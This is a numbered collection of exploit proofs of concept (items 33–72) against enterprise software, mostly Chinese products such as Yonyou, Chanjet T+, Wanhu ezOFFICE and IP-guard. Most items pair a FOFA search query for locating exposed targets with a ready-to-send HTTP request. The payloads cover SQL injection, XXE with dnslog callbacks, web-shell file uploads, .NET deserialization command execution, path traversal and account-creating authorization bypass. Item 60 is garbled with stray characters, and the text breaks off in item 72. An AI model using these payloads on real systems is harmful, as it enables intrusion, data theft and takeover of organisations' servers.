33. Yonyou (用友) NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou (用友) NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou (用友) NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou (用友) NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou (用友) NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou (用友) U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou (用友) U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou (用友) U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou (用友) U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou (用友) GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou (用友) GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
    <soapenv:Header/>
    <soapenv:Body>
        <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
            <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
        </ser:getUserNameById>
    </soapenv:Body>
</soapenv:Envelope>

44. Yonyou (用友) GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou (用友) GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou (用友) GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou (用友) GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou (用友) U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
123
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou (用友) U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong (云时空) social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPTech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd",
                "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
            }
        }
    }
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet (畅捷通) T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet (畅捷通) T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
    "storeID":{
        "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
        "MethodName":"Start",
        "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo": {
                "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
            }
        }
    }
}

57. Chanjet (畅捷通) T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet (畅捷通) T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

$ T8 }9 A" F5 \7 s+ m60. 百卓Smart管理平台 importexport.php SQL注入! i& V; R2 w+ B
FOFA:title="Smart管理平台"% S6 K' A, {7 H- `" X2 L
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.18 q7 _$ \4 d! V% M7 x9 i' b2 r& w
Host:
1 E$ \( G9 t+ ^) I1 @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.364 t& q& T" v( g+ o
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% z! C2 y7 w8 @! CAccept-Encoding: gzip, deflate7 Q/ F1 v9 H* `& y, z( L0 E. S
Accept-Language: zh-CN,zh;q=0.9
0 n6 F" l) p, [Connection: close
$ n1 `$ C+ `4 [4 V6 w; G c0 p' D8 [0 i: J- d5 p
- H# t5 L# N' L, F
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. 捷诚 management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 一脸通 smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. 万户 ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the file written, dir gives the path it is written to, and fileType gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户 ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

